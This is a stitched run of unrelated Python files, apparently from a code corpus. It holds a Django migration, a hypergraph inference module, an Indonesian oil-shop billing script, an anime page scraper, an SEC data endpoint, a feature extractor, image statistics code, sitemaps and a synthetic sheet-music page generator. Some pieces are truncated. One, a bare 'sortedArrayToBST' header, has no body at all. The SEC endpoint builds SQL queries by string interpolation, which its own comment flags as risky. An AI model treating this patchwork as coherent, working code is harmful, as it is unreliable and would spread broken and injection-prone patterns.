    """Auto-generated: add Nursery/Users models, rename Plants.name to
    plant_name, and wire up the UserPlant and NurseryPlant through tables."""
    dependencies = [
        ('Nursery_API', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Nursery',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=40, unique=True)),
                ('location', models.CharField(max_length=40)),
            ],
        ),
        migrations.CreateModel(
            name='UserPlant',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nursery_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.nursery')),
            ],
        ),
        migrations.RemoveField(
            model_name='plants',
            name='name',
        ),
        migrations.AddField(
            model_name='plants',
            name='plant_name',
            field=models.CharField(default='Not', max_length=40, unique=True),
            preserve_default=False,
        ),
        migrations.CreateModel(
            name='Users',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=20, unique=True)),
                ('last_name', models.CharField(max_length=20)),
                ('age', models.IntegerField(default=18)),
                ('plant_name', models.ManyToManyField(through='Nursery_API.UserPlant', to='Nursery_API.Plants')),
            ],
        ),
        migrations.AddField(
            model_name='userplant',
            name='plant_name',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.plants'),
        ),
        migrations.AddField(
            model_name='userplant',
            name='user_name',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.users'),
        ),
        migrations.CreateModel(
            name='NurseryPlant',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nursery_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.nursery')),
                ('plant_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Nursery_API.plants')),
            ],
        ),
        migrations.AddField(
            model_name='nursery',
            name='Plant_name',
            field=models.ManyToManyField(through='Nursery_API.NurseryPlant', to='Nursery_API.Plants'),
        ),
    ]
|
class Inference(object):
    """Accumulated state of a rule match.

    edge -- the inferred hyperedge (or None while still matching).
    matches -- tuple of (premise, matched_edge) pairs.
    variables -- mapping of pattern variables to their bound values.
    Instances combine with `+`: matches concatenate, variable bindings merge
    (other's win on conflict), and the first non-None edge is kept.
    """

    def __init__(self, edge=None, matches=(), variables=None):
        self.edge = edge
        self.matches = matches
        # Bug fix: the default used to be a shared mutable `{}` — every
        # Inference created without explicit variables aliased one dict.
        self.variables = {} if variables is None else variables

    def __add__(self, other):
        """Merge two partial inferences into a new one."""
        edge = other.edge if self.edge is None else self.edge
        matches = self.matches + other.matches
        variables = {**self.variables, **other.variables}
        return Inference(edge=edge, matches=matches, variables=variables)
def is_rule(edge):
    """Return True iff edge has the shape (:- conclusion premise).

    A rule is a non-atom edge of exactly three parts whose head prints as
    ':-' and whose conclusion and premise are themselves non-atom edges.
    The checks short-circuit in the same order as the original guards.
    """
    return (not edge.is_atom()
            and len(edge) == 3
            and edge[0].to_str() == ':-'
            and not edge[1].is_atom()
            and not edge[2].is_atom())
def match_premises(hg, premises, inference):
    """Yield every extension of `inference` matching all `premises` against hg.

    Recursive generator: with no premises left the accumulated inference is
    complete; otherwise each match of the first premise is extended by all
    matches of the remaining ones.
    """
    if not premises:
        yield inference
        return
    head, rest = premises[0], premises[1:]
    for partial in match_premise(hg, head, inference.variables):
        for tail in match_premises(hg, rest, partial):
            yield inference + tail
def match_premise(hg, premise, curvars=None):
    """Yield Inference objects for every way `premise` matches the hypergraph.

    An 'and' premise recursively matches all of its conjuncts; otherwise the
    premise (with current variable bindings applied) is matched directly
    against hg, yielding one Inference per binding result.
    """
    # Bug fix: the default used to be a mutable `{}` shared across all calls;
    # use None as the sentinel and create a fresh dict per call.
    if curvars is None:
        curvars = {}
    if premise[0].to_str() == 'and':
        # Conjunction: match every sub-premise, accumulating bindings.
        for inference in match_premises(hg, premise[1:], Inference()):
            yield inference
    else:
        pattern = premise.apply_vars(curvars)
        for edge, results in hg.match(pattern):
            for result in results:
                yield Inference(
                    matches=((premise, edge),),
                    variables={**curvars, **result})
def eval_rule(hg, rule):
    """Apply a (:- conclusion premise) rule to hypergraph hg.

    Yields one Inference per premise match, with .edge set to the rule's
    conclusion instantiated under that match's variable bindings.
    Raises RuntimeError if `rule` is not shaped like a rule.
    """
    if not is_rule(rule):
        raise RuntimeError('Not a valid rule: {}'.format(rule.to_str()))
    conclusion = rule[1]
    for inference in match_premise(hg, rule[2]):
        inference.edge = conclusion.apply_vars(inference.variables)
        yield inference
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 18 19:44:46 2021
@author: DWI PRAMONO
"""
#Buat program untuk menampilakan dan menghitung biaya total Bengkel UD. Matahari
#1. set variabel merk, jumlah, harga, subtotawal, subtotakhir, diskon, ppn, total
#2. input pilihan merk oli dan harga
#3. input jumlah
#4. subtotawal = harga * jumlah
#5. jika subtotalawal > 200000 maka mendapat diskon 5%
#6. diskon = subtotalawal * 0.05
#7. subtotakhir = subtotawal - diskon
#8. semua transaksi dikenakan ppn 1%
#10. ppn = subtotakhir * 0.01
#11. total = subtotakhir - ppn
#12. tampilkan merk, harga, subtotakhir, diskon, ppn, total
ulang = "y"
# One oil-purchase transaction per pass; repeats until the user answers T.
# NOTE(review): the loop condition tests `ulang`, but only `jawab` is read at
# the bottom — any answer other than t/T repeats forever; confirm intent.
while ulang=="y" or ulang=="Y":
    print ("===========================================")
    print (" BENGKEL MOTOR UD. MATAHARI ")
    print ("===========================================")
    print ("")
    print (" List Merk Oli")
    print ("-------------------------------------------")
    print (" A. Duration SW20 1L")
    print (" B. Castrol Magnatec 1L")
    print (" C. Federal Supreme XX 1L")
    print (" D. Yamalube 1L")
    print (" E. Shell 1L")
    print ("-------------------------------------------")
    # Parallel lists: brand names and their prices; slot 5 is the
    # invalid-choice placeholder ('-', price 0).
    merk = ['Duration SW20 1L','Castrol Magnatec 1L','Federal Supreme XX 1L','Yamalube 1L','Shell 1L','-']
    harga = [53000,50000,54000,45000,46000,0]
    pilihan = input(" Masukkan list abjad Merk Oli = ")
    print ("-------------------------------------------")
    # Map the letter choice to a list index.
    # NOTE(review): only lowercase a-e are accepted, and an invalid choice
    # still proceeds with price 0 instead of re-prompting — confirm intent.
    if pilihan=="a":
        idx = 0
    elif pilihan=="b":
        idx = 1
    elif pilihan=="c":
        idx = 2
    elif pilihan=="d":
        idx = 3
    elif pilihan=="e":
        idx = 4
    else:
        idx = 5
        pesan = " !!! Masukkan Sesuai List yang ada !!!"
        print (pesan)
    print("")
    jumlah = int(input(" Jumlah = "))
    # Echo the selected brand and unit price.
    print(" Merk Oli = " + merk[idx])
    print(" Harga = Rp." + str(harga[idx]))
    # Compute the transaction: 5% discount above Rp200000, then 1% PPN.
    fixharga = harga[idx]
    subtotawal = fixharga * jumlah
    if subtotawal > 200000:
        diskon = subtotawal * 0.05
    else:
        diskon = 0
    subtotakhir = subtotawal - diskon
    ppn = subtotakhir * 0.01
    # NOTE(review): PPN (tax) is subtracted here, matching the spec comment at
    # the top of the file, but taxes are normally added — confirm.
    total = subtotakhir - ppn
    print(" diskon = Rp." + str(diskon))
    # Show the totals.
    print("-------------------------------------------")
    print(" Subtotal = Rp." + str(subtotakhir))
    print('-------------------------------------------')
    print("")
    print(" PPN = Rp." + str(ppn))
    print("")
    print("-------------------------------------------")
    print(" TOTAL = Rp." + str(total))
    print("")
    print("===========================================")
    print(" TERIMA KASIH")
    print("===========================================")
    # Ask whether to run another transaction; t/T exits.
    jawab = input (" ULANGI PROGRAM ? Y/T = ")
    if jawab == "t" or jawab =="T":
        break
import TreeNode
def sortedArrayToBST(num):
|
import calendar
import logging
from collections import defaultdict
from datetime import datetime
import lxml.html
from dateutil.parser import parse
from pyquery import PyQuery as pq
logger = logging.getLogger()
class AnimeParser:
    """Extracts structured fields from a MyAnimeList-style anime HTML page.

    Keeps two parallel views of the same document: a PyQuery object
    (self._pq) for CSS-style lookups and an lxml tree (self._tree) for
    XPath. When html is falsy, only the id (derived from the URL) is
    available.
    """
    def __init__(self, url, html):
        self._url = url
        self._html = html
        if html:
            self._pq = pq(html)
            self._tree = lxml.html.fromstring(html)
        # Field name -> extractor method; driven by get_all_fields_dict().
        self.fields = {
            'aired_from_to': self.get_aired_from_to,
            'duration': self.get_duration,
            'episodes': self.get_episodes,
            'english': self.get_english,
            'favorites': self.get_favorites,
            'image': self.get_image,
            'id': self.get_id,
            'genres': self.get_genres,
            'japanese': self.get_japanese,
            'members': self.get_members,
            'members_score': self.get_score,
            'producers': self.get_producers,
            'related': self.get_related,
            'rating': self.get_rating,
            'synopsis': self.get_synopsis,
            'status': self.get_status,
            'synonyms': self.get_synonyms,
            'scores': self.get_scored,
            'title': self.get_title,
            'type': self.get_type,
        }
    def parse(self):
        """Public entry point: return the dict of all parsed fields."""
        return self.get_all_fields_dict()
    def get_all_fields_dict(self):
        """Run every extractor; per-field parse errors are logged, not raised."""
        res = {}
        if self._html:
            for name, func in self.fields.items():
                try:
                    res[name] = func()
                except (ValueError, IndexError) as e:
                    logger.error('parsing error {} ({}) for field {}'.format(e, self._url, name))
        else:
            # Without HTML, the id is the only derivable field.
            res['id'] = self.get_id()
        return res
    def get_id(self):
        # The anime id is the last path component of the URL.
        return int(self._url.split('/')[-1])
    def get_aired_from_to(self):
        """Return (from, to) air dates as UTC epoch seconds (or None)."""
        aired_from_to = self.get_aired()
        if aired_from_to == 'Not available':
            return None, None
        aired_split = aired_from_to.split('to')
        # Missing month/day in fuzzy parses default to Jan 1 of this year.
        default_date = datetime.today().replace(month=1, day=1)
        aired_from = calendar.timegm(parse(aired_split[0].strip(), fuzzy=True, default=default_date).utctimetuple())
        if len(aired_split) > 1:
            if aired_split[1].strip() == '?':
                # Still airing / unknown end date.
                aired_to = None
            else:
                aired_to = calendar.timegm(parse(aired_split[1].strip(), fuzzy=True, default=default_date).utctimetuple())
        else:
            # Single date (e.g. a movie): from == to.
            aired_to = aired_from
        return aired_from, aired_to
    def parse_duration_time(self, time_str):
        """Convert a duration like '1 hr. 24 min.' into total minutes."""
        hr = 0
        hr_split = time_str.split('hr.')
        if len(hr_split) > 1:
            hr = int(hr_split[0].strip())
            time_str = hr_split[1]
        min_split = time_str.split('min.')
        minutes = int(min_split[0].strip()) if len(min_split) > 1 else 0
        return hr*60 + minutes
    def get_related(self):
        """Return {relation: [{'t': type, 'i': id}, ...]} from the related table."""
        result = defaultdict(list)
        for tr in self._pq('.anime_detail_related_anime tr').items():
            # Relation label, lowercased, trailing ':' dropped.
            related = tr('td:first').text().lower()[:-1]
            for link in tr('a').items():
                related_url = link.attr['href']
                related_type, str_id = related_url.split('/')[1:3]
                if str_id:
                    result[related].append({'t': related_type, 'i': int(str_id)})
        return result
    def get_title(self):
        return self._tree.xpath('//h1/span/text()')[0].strip()
    def get_type(self):
        # The type may be a link or plain text depending on page variant.
        type_node = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Type:"]/../a/text()')
        if type_node:
            return type_node[0]
        else:
            type_node = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Type:"]/../text()')[1]
            return type_node.strip()
    def get_image(self):
        img = self._tree.xpath('//*[@id="content"]/table/tr/td[1]/div/div[1]/a/img')
        return img[0].attrib['src'] if img else None
    def get_episodes(self):
        """Return the episode count as int, or None when unknown."""
        episodes = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Episodes:"]')[0].tail.strip()
        if episodes and episodes != 'Unknown':
            episodes = int(episodes)
        else:
            episodes = None
        return episodes
    def get_status(self):
        return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Status:"]')[0].tail.strip()
    def get_rating(self):
        return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Rating:"]')[0].tail.strip()
    def get_english(self):
        # Optional field: returns None implicitly when absent.
        xpath_result = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="English:"]')
        if xpath_result:
            return xpath_result[0].tail.strip()
    def get_synonyms(self):
        # Optional field: returns None implicitly when absent.
        xpath_result = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Synonyms:"]')
        if xpath_result:
            return xpath_result[0].tail.strip()
    def get_japanese(self):
        # Optional field: returns None implicitly when absent.
        xpath_result = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Japanese:"]')
        if xpath_result:
            return xpath_result[0].tail.strip()
    def get_members(self):
        text = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Members:"]')[0].tail
        return int(text.replace(',', '').strip())
    def get_favorites(self):
        text = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Favorites:"]')[0].tail
        return int(text.replace(',', '').strip())
    def get_scored(self):
        """Return the number of users who scored; falls back through layouts."""
        members = self._pq('[itemprop="ratingCount"]').text().replace(',', '')
        if not members:
            scored_str = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../small')
            members = scored_str[0].text.split()[-2] if scored_str else ''
        if not members:
            span = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../span[3]/text()')
            members = span[0] if span else ''
        return int(members)
    def get_score(self):
        """Return the mean member score as float, or None for 'N/A'."""
        score = self._pq('[itemprop="ratingValue"]').text()
        if not score:
            score_str = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../text()')
            score = score_str[0].strip() if score_str else ''
        if not score:
            span = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Score:"]/../span[2]/text()')
            score = span[0] if span else ''
        return float(score) if score != 'N/A' else None
    def get_duration(self):
        """Return per-episode duration in minutes, or None when unknown."""
        duration_str = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Duration:"]')[0].tail.strip()
        if duration_str != 'Unknown':
            duration = self.parse_duration_time(duration_str)
        else:
            duration = None
        return duration
    def get_aired(self):
        return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Aired:"]')[0].tail.strip()
    def get_synopsis(self):
        """Return the synopsis text; the 'no synopsis' placeholder maps to ''."""
        description = self._pq('[itemprop="description"]').text()
        description = description or self._pq('h2:contains("Synopsis")')[0].tail
        if description and 'No synopsis information has been added to this title' in description:
            description = ''
        return description
    def get_genres(self):
        raw_genres = self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Genres:"]/../a/text()')
        # Pages without genres show an 'add some' link; drop that placeholder.
        empty_genres = 'add some'
        if raw_genres and empty_genres in raw_genres:
            raw_genres.remove(empty_genres)
        return raw_genres
    def get_producers(self):
        return self._tree.xpath('//*[@id="content"]/table/tr/td[1]//span[text()="Producers:"]/../a/text()')
|
from django.shortcuts import render
from django.http import HttpResponse
def home(request):
    """Render the shop landing page."""
    return render(request,'shop/homepage.html')
from carbon_black.endpoints.base_endpoint import Endpoint
from shared.models import SEC as SEC_Model, SEC_Company_Info, SEC_Employee_Stock, SEC_Merger, SEC_Secondary_Offering
from datetime import datetime
from json import loads as json_loads
class SEC(Endpoint):
    """Endpoint that assembles SEC filing data for one transaction.

    get() loads the top-level SEC rows and, for each, pulls the related
    company-info, secondary-offering, merger and employee-stock records
    into plain dicts via the shared models.
    """

    def __init__(self) -> None:
        super().__init__()
        # Cached by get(); reused by the make_* helpers for follow-up queries.
        self.api_endpoint = None

    def get(self, api_endpoint: str, transaction_id: int) -> dict:
        """Return the list of assembled SEC records for transaction_id,
        or an {'error': {'sec': ...}} dict if anything fails.
        """
        try:
            self.api_endpoint = api_endpoint
            # NOTE(review): values are interpolated directly into SQL here and
            # in every make_* helper. Safe only while the ids are internal
            # ints — prefer parameterized queries if self.query supports them.
            results = self.query(
                api_endpoint, f"SELECT * FROM SEC WHERE transaction_id = {transaction_id};")
            return self.make_sec_model(results)
        except Exception as err:
            return {
                'error': {
                    'sec': str(repr(err))
                }
            }

    def make_sec_model(self, sql_results: list):
        """Map raw SEC rows to dicts, attaching all related sub-records."""
        all_results = []
        for item in sql_results:
            model = SEC_Model()
            model.data['sec_id'] = item[0]
            model.data['transaction_id'] = item[1]
            model.data['date_of_ipo'] = item[2].strftime(
                '%Y-%m-%d') if item[2] else None
            model.data['late_filings'] = item[3]
            model.data['ct_orders'] = item[4]
            model.data['is_adr'] = bool(item[5])
            model.data['company_info'] = self.make_company_info(item[0])
            model.data['secondary_offerings'] = self.make_secondary_offering(
                item[0])
            model.data['mergers'] = self.make_mergers(item[0])
            model.data['stock_program'] = self.make_stock_program(item[0])
            all_results.append(model.data)
        return all_results

    def make_secondary_offering(self, sec_id: int) -> list:
        """Return secondary-offering dicts for one SEC record."""
        all_results = []
        results = self.query(
            self.api_endpoint, f"SELECT * FROM SEC_Secondary_Offering WHERE sec_id = {sec_id};")
        for item in results:
            model = SEC_Secondary_Offering()
            model.data['sec_secondary_offering_id'] = item[0]
            model.data['sec_id'] = item[1]
            model.data['date'] = item[2].strftime(
                '%Y-%m-%d') if item[2] else None
            model.data['additional_shares_issued'] = item[3]
            model.data['is_asr'] = bool(item[4])
            model.data['link'] = item[5]
            all_results.append(model.data)
        return all_results

    def make_company_info(self, sec_id: int) -> list:
        """Return company-info dicts for one SEC record."""
        all_results = []
        results = self.query(
            self.api_endpoint, f"SELECT * FROM SEC_Company_Info WHERE sec_id = {sec_id};")
        for item in results:
            model = SEC_Company_Info()
            model.data['sec_company_info_id'] = item[0]
            model.data['sec_id'] = item[1]
            model.data['date'] = item[2].strftime(
                '%Y-%m-%d') if item[2] else None
            model.data['link'] = item[3]
            # item_list is stored as a JSON string in the DB.
            model.data['item_list'] = json_loads(item[4])
            all_results.append(model.data)
        return all_results

    def make_mergers(self, sec_id: int) -> list:
        """Return merger dicts for one SEC record."""
        all_results = []
        results = self.query(
            self.api_endpoint, f"SELECT * FROM SEC_Merger WHERE sec_id = {sec_id};")
        for item in results:
            model = SEC_Merger()
            model.data['sec_merger_id'] = item[0]
            model.data['sec_id'] = item[1]
            model.data['date'] = item[2].strftime(
                '%Y-%m-%d') if item[2] else None
            model.data['merging_with_company'] = item[3]
            model.data['merging_with_cik'] = item[4]
            all_results.append(model.data)
        return all_results

    def make_stock_program(self, sec_id: int) -> list:
        """Return employee-stock-program dicts for one SEC record."""
        all_results = []
        results = self.query(
            self.api_endpoint, f"SELECT * FROM SEC_Employee_Stock WHERE sec_id = {sec_id};")
        for item in results:
            # Bug fix: previously instantiated SEC_Secondary_Offering here
            # (copy-paste from make_secondary_offering), mislabelling
            # employee-stock rows; SEC_Employee_Stock was imported but unused.
            model = SEC_Employee_Stock()
            model.data['sec_employee_stock_id'] = item[0]
            model.data['sec_id'] = item[1]
            model.data['date'] = item[2].strftime(
                '%Y-%m-%d') if item[2] else None
            model.data['additional_shares_issued'] = item[3]
            model.data['link'] = item[4]
            all_results.append(model.data)
        return all_results
|
import re
import tokenizer
from feature_extractor_counts import FeatureExtractorCounts
from ..preprocessing import data_splitting as ds
from ..util import defines
from ..util import file_handling as fh
class FeatureExtractorCountsBrownClusters(FeatureExtractorCounts):
    """Count-based feature extractor whose tokens are Brown-cluster ids.

    Tokenizes each response, maps every token to its cluster id via the
    cluster index file named by `clusters`, and builds count features over
    those cluster ids. (Python 2 module -- note the print statements.)
    """
    def __init__(self, test_fold=0, dev_subfold=None, binarize=False, clusters=''):
        #print "Creating from arguments"
        name = 'brownclusters'
        prefix = '_bc-' + clusters + '_'
        FeatureExtractorCounts.__init__(self, name, prefix, add_oov=True,
                                        min_doc_threshold=1,
                                        binarize=binarize,
                                        test_fold=test_fold,
                                        dev_subfold=dev_subfold)
        # Remember which cluster file was used; also folded into the dirname.
        self.params['clusters'] = clusters
        FeatureExtractorCountsBrownClusters.extend_dirname(self)
    def extend_dirname(self):
        # Make the output directory name unique per cluster file.
        self.dirname = self.dirname + ',' + self.params['clusters']
    def get_dirname(self):
        return self.dirname
    def get_full_name(self):
        return fh.get_basename(self.dirname)
    def extract_features(self, write_to_file=True):
        """Tokenize all responses, map tokens to clusters, and build the
        vocabulary and feature-count matrix (optionally persisted)."""
        print "Extracting ngram tokens:"
        if self.get_dev_subfold() is None:
            # No dev subfold: merge dev into train.
            # NOTE(review): `dev = 0` below is immediately overwritten by the
            # tuple unpack -- looks like dead code.
            dev = 0
            train, dev, test = ds.get_all_splits(test_fold=self.get_test_fold(),
                                                 dev_subfold=self.get_dev_subfold())
            train = train + dev
        else:
            train, dev, test = ds.get_all_splits(test_fold=self.get_test_fold(),
                                                 dev_subfold=self.get_dev_subfold())
        all_items = train + dev + test
        responses = fh.read_json(defines.data_normalized_text_file)
        # token -> cluster-id mapping loaded from the configured cluster file.
        cluster_filename = fh.make_filename(defines.resources_clusters_dir, self.params['clusters'], 'json')
        cluster_dict = fh.read_json(cluster_filename)['index']
        label_files = fh.get_label_files()
        tokens = {}
        for f in label_files:
            print f
            self.extract_tokens_from_file(responses, f, 1, cluster_dict, tokens)
        vocab = self.make_vocabulary(tokens, all_items)
        feature_counts, oov_counts = self.extract_feature_counts(all_items, tokens, vocab)
        if write_to_file:
            vocab.write_to_file(self.get_vocab_filename())
            fh.write_to_json(all_items, self.get_index_filename(), sort_keys=False)
            fh.pickle_data(feature_counts, self.get_feature_filename())
            fh.write_to_json(oov_counts, self.get_oov_count_filename(), sort_keys=False)
        self.feature_counts = feature_counts
        self.index = all_items
        self.vocab = vocab
        self.oov_counts = oov_counts
    def extract_tokens_from_file(self, responses, input_filename, n, cluster_dict, token_dict):
        """For every response id in the label file, tokenize its text into
        n-grams and store the prefixed cluster ids in token_dict[rid]."""
        Y = fh.read_csv(input_filename)
        rids = Y.index
        for rid in rids:
            text = responses[rid].lower()
            text = text.lstrip()
            text = text.rstrip()
            tokens = []
            sentences = tokenizer.split_sentences(text)
            for s in sentences:
                sent_tokens = tokenizer.make_ngrams(s, n)
                # Strip stray quote characters around word tokens only.
                sent_tokens = [t.rstrip('`"\'') if re.search('[a-z]', t) else t for t in sent_tokens]
                sent_tokens = [t.lstrip('`"\'') if re.search('[a-z]', t) else t for t in sent_tokens]
                # Sentence-boundary marker.
                sent_tokens = sent_tokens + ['__ENDS__']
                tokens = tokens + sent_tokens
            # Keep only tokens with a known cluster; prefix marks the feature family.
            tokens = [self.get_prefix() + cluster_dict[t] for t in tokens if t in cluster_dict]
            token_dict[rid] = tokens
def main():
    # placeholder entry point; extraction is driven by callers importing the class
    pass
if __name__ == '__main__':
    main()
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
#created by liangj
import cv2 as cv
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import sys
import os
def dealWithWhite(inputArray):
    """Return a flat array of every pixel in a single-channel image that is
    not pure white (255), preserving row-major scan order.

    Vectorized replacement for the original per-pixel double loop: boolean
    mask indexing flattens in C (row-major) order, which matches the original
    height-then-width traversal exactly.
    """
    inputArray = np.asarray(inputArray)
    return inputArray[inputArray != 255]
def dealOneImage(image):
    """Print max/min/mean of the non-white pixels of each colour channel.

    `image` is an OpenCV-style H x W x 3 array (channel order B, G, R).
    Note: numpy raises on an all-white channel (empty max/min) -- same as the
    original behaviour.

    Fix: the original had a stray dead expression (`;60`) after the rmin
    assignment; removed, along with the superfluous semicolons.
    """
    B = dealWithWhite(image[:, :, 0])
    G = dealWithWhite(image[:, :, 1])
    R = dealWithWhite(image[:, :, 2])
    print("Blue max min mean %f %f %f" % (B.max(), B.min(), B.mean()))
    print("Green max min mean %f %f %f" % (G.max(), G.min(), G.mean()))
    print("Red max min mean %f %f %f" % (R.max(), R.min(), R.mean()))
def main(argv):
    """Walk the image folder and print per-channel stats for every file."""
    # both variables point at the same directory; fileName is effectively
    # unused below (Windows-only backslash paths)
    fileName = "D:\Lymph_Follicle\python\catalog\images";# JF14_091_S8_HE-2.png
    folderFullName = "D:\Lymph_Follicle\python\catalog\images";
    for parent,dirnames,filenames in os.walk(folderFullName):
        for filename in filenames:
            # filename = filenames[0];
            print(filename+"\n");
            # NOTE(review): cv.imread returns None for unreadable files, which
            # would make .shape raise -- no guard here
            image = cv.imread(folderFullName+"\\"+filename);
            print(image.shape);
            dealOneImage(image);
if __name__ == '__main__':
    main(sys.argv)
from django.contrib.sitemaps import Sitemap
from .models import Musica, Categoria, DiaLiturgico
class MusicaSitemap(Sitemap):
    """Sitemap entries for every song (Musica)."""
    changefreq = "weekly"  # crawler hint
    priority = 0.6
    def items(self):
        # every song is listed; URLs come from each object's get_absolute_url()
        return Musica.objects.all()
class CategoriaSitemap(Sitemap):
    """Sitemap entries for every category (Categoria)."""
    changefreq = "weekly"  # crawler hint
    priority = 0.5
    def items(self):
        return Categoria.objects.all()
class DiaLiturgicoSitemap(Sitemap):
    """Sitemap entries for every liturgical day (DiaLiturgico)."""
    changefreq = "weekly"  # crawler hint
    priority = 0.7
    def items(self):
        return DiaLiturgico.objects.all()
|
import os
import sys
import numpy as np
import cv2
import pandas as pd
from PIL import Image
import xml.etree.ElementTree as ET
from xml.dom import minidom
from bs4 import BeautifulSoup
from bs4 import Comment
import re
import random
import time
################################################################################
# IMPORTANT INFO (20-02-10 update)
# - use 'output_img_191023' images and 'output_nc_split_191023' for making pages
# --- interactive configuration ---
print('\nHow many pages would you like to make?')
num_pages = int(input())
print('')
print('Delete current pages? [No: 0, Yes: 1]')
delete_decision = int(input())
print('')
# print('How many staffs do you want on a page?')
# num_staffs = int(input())
# --- page layout constants (pixels) ---
page_width = 2000
page_height = 3000
top_offset = 200
bottom_offset = 500
margin_left = 200
margin_right = 200
staff_spacing = 100
# template image for the staff lines (second arg 'r' is the legacy mode
# parameter of Image.open)
staff_image = Image.open('fake_staff_lines.png', 'r')
neume_path = 'output_img_191023/'
save_path = 'fake_images/'
save_image_path = save_path + 'img/'
save_meta_path = save_path + 'txt/'
# wipe previous output if requested (fixed path, shell rm -rf)
if delete_decision == 1:
    os.system(f'rm -rf { save_path }')
elif delete_decision != 0:
    sys.exit("Please select 0 or 1")
if not os.path.isdir(save_path):
    os.mkdir(save_path)
if not os.path.isdir(save_image_path):
    os.mkdir(save_image_path)
if not os.path.isdir(save_meta_path):
    os.mkdir(save_meta_path)
# CSV of neume glyphs: file_name,type -- strip whitespace from string columns
neume_info = pd.read_csv('output_nc_split_191023.txt')
neume_info = neume_info.apply(lambda x: x.str.strip() if x.dtype == "object" else x)
# print(neume_info)
staff_width_orig, staff_height_orig = staff_image.size
# df.loc[df['column_name'].isin(some_values)]
# split the glyph table into plain neumes, clefs, and custos glyphs
neumes = neume_info.loc[~neume_info['type'].isin(['clef.c', 'clef.f', 'custos'])]
clefs = neume_info.loc[neume_info['type'].isin(['clef.c', 'clef.f'])]
custos_arr = neume_info.loc[neume_info['type'] == 'custos']
# print(custos_arr)
# scale so each staff is nominally 100px tall
staff_scale = 100 / staff_height_orig
# staff_image.thumbnail((staff_width_orig*staff_scale, staff_height_orig*staff_scale), Image.ANTIALIAS)
staff_coords = []
# --- main generation loop: one synthetic page per iteration ---
for k in range(num_pages):
    # parchment-coloured blank page
    blank_image = Image.new('RGBA', (page_width, page_height), (232, 228, 220, 255))
    num_staffs = random.randint(10,16)
    # NOTE(review): filename has 1-second granularity -- pages generated
    # within the same second overwrite each other; confirm acceptable.
    timestamp = time.strftime("%Y%m%d%H%M%S")
    print(f'Making page_{ timestamp } ...')
    with open(f'{ save_meta_path }page_{ timestamp }.txt', 'w') as f:
        # per-page metadata: one bounding box per pasted glyph
        f.write('neume,ulx,uly,lrx,lry\n')
        for i in range(num_staffs):
            # stop stacking staves once the next one would run past the
            # bottom margin (vertical step uses staff_width_orig -- assumed
            # intentional spacing constant; verify)
            if top_offset + int(0.33 * i * staff_width_orig*staff_scale) > page_height - bottom_offset:
                break
            neume_name = random.choice(neume_info['file_name'])
            neume_image = Image.open(neume_path + neume_name, 'r')
            # trim 15px of padding from top and bottom of the glyph
            neume_image = neume_image.crop((0,15, neume_image.size[0], neume_image.size[1] - 15))
            # jitter the staff size slightly for realism
            staff_scale_height = staff_scale * random.uniform(0.93, 1.07)
            staff_scale_width = random.uniform(0.97, 1.03)
            # Image.ANTIALIAS is deprecated in modern Pillow (use LANCZOS) --
            # kept for compatibility with the pinned environment
            staff_place = staff_image.resize((int(staff_scale_width * (page_width - margin_left - margin_right)), int(staff_height_orig*staff_scale_height)), Image.ANTIALIAS)
            w, h = staff_place.size
            # one staff-line spacing (staff has ~5 lines -> 6ths of height)
            pos_offset = int(h / 6)
            margin_left_offset = random.randint(-10,10)
            blank_image.paste(staff_place, (margin_left + margin_left_offset , top_offset + int(0.33 * i * staff_width_orig*staff_scale)), mask=staff_place)
            num_neumes = random.randint(15, 30)
            for j in range(num_neumes):
                # first glyph on a staff is always a clef...
                if j == 0: #
                    choice = clefs.sample(n=1)
                    choice_file, choice_type = choice.iloc[0]
                    n_place = random.choice([0, 2, 4])
                    scale = 2/3 + 0.05
                # ...and the last is always a custos
                elif j == num_neumes - 1:
                    choice = custos_arr.sample(n=1)
                    choice_file, choice_type = choice.iloc[0]
                    n_place = random.randint(0,8)
                    scale = 1/3
                else:
                    choice = neumes.sample(n=1)
                    choice_file, choice_type = choice.iloc[0]
                    # taller oblique glyphs get a bigger scale and fewer
                    # allowed vertical positions
                    if choice_type == 'oblique2':
                        n_place = random.randint(0,7)
                        scale = 1/2
                    elif choice_type == 'oblique3':
                        n_place = random.randint(0,6)
                        scale = 2/3
                    elif choice_type == 'oblique4':
                        n_place = random.randint(0,5)
                        scale = 5/6
                    else:
                        n_place = random.randint(0,8)
                        scale = 1/3
                n_image = Image.open(neume_path + choice_file)
